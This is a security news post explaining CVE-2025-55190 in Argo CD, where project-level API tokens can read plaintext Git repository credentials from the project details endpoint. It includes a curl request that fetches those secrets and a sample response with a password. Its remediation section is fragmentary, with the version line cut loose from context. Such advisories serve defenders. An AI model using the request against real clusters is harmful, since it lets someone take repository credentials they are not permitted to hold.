CVE CyberSecurity Database News

CVE-2025-55190 - Critical Argo CD Project API Token Vulnerability Exposes Repository Credentials

Poster -

A recent security flaw, CVE-2025-55190, has been disclosed in multiple versions of Argo CD—a popular GitOps continuous delivery tool for Kubernetes. This vulnerability allows any attacker with a project-level API token to retrieve sensitive Git repository credentials (usernames & passwords) via Argo CD's project details API endpoint. Worryingly, this exposure happens even if the API token has only app management permissions and explicitly no secret access.

Let's break this down in plain terms, show the real risk with code examples, and explain how to protect your clusters.

What is Argo CD?

Argo CD is a tool that lets you manage Kubernetes applications by syncing your cluster state directly to code stored in Git repositories (GitOps). Argo CD supports multi-tenancy, and project-level roles let you define fine-grained access for different users or teams.

The Issue: Project Tokens Can Read Repo Credentials

If you have an API token for any project, and your role allows just projects, get action (no secret access), you can still read sensitive repository credentials.

Why is this Bad?

Someone with only maintenance or deployment rights (not supposed to access secrets) can extract Git repository passwords, SSH private keys, or personal access tokens. These secrets can be used to clone/change source code or leak other secrets.

If an API token has this permission (via Role-Based Access Control, RBAC)

p, role/user, projects, get, *, allow

Or simply projects, get on a project, you can use the /api/v1/projects/{project} API endpoint. The response—before the fix—includes not just project info but also all repository credentials (in plaintext).

Code Example: Stealing Secrets With a Regular Token

Suppose you have an API token (let's call it ARGO_API_TOKEN) for a role that only allows managing applications within a project (myproject). You don't have direct secret access.

You can fetch all secrets with a simple curl command

# Replace ARGO_SERVER, ARGO_API_TOKEN, and myproject accordingly
curl -k \
     -H "Authorization: Bearer $ARGO_API_TOKEN" \
     "https://ARGO_SERVER/api/v1/projects/myproject";

Response Snippet (Vulnerable Argo CD versions):

{
  "project": {
    "metadata": {...},
    "spec": {
      ...
      "sourceRepos": [
        {
          "url": "https://gitlab.com/company/repo.git";,
          "username": "gituser",
          "password": "supersecretpassword"
        }
      ]
    }
  }
}

Bingo: The API gives you access to the repository's username and password immediately!

Why Does This Happen?

The API endpoint /api/v1/projects/{project} was not filtering or redacting the repo credentials in its response—even for tokens not meant to see secrets.

>= 3.1.2

- Rotate any credentials, tokens, or secrets that could have been accessed by project-level users—assume they could have been leaked.

References & Original Advisories

- Official Argo CD Security Advisory
- NIST NVD – CVE-2025-55190
- Argo CD Issue Tracker (search with CVE-2025-55190 for discussion threads)

Conclusion

CVE-2025-55190 is a high-severity exposure that can totally undermine your Argo CD and GitOps security posture. Anyone with a low-privilege API token and project read access can quietly steal all your repository credentials.

Don't rely on RBAC alone—upgrade as soon as possible.
If you run vulnerable Argo CD versions, assume secrets may have leaked and rotate those credentials right now.

Timeline

Published on: 09/04/2025 23:15:32 UTC
Last modified on: 09/19/2025 15:20:53 UTC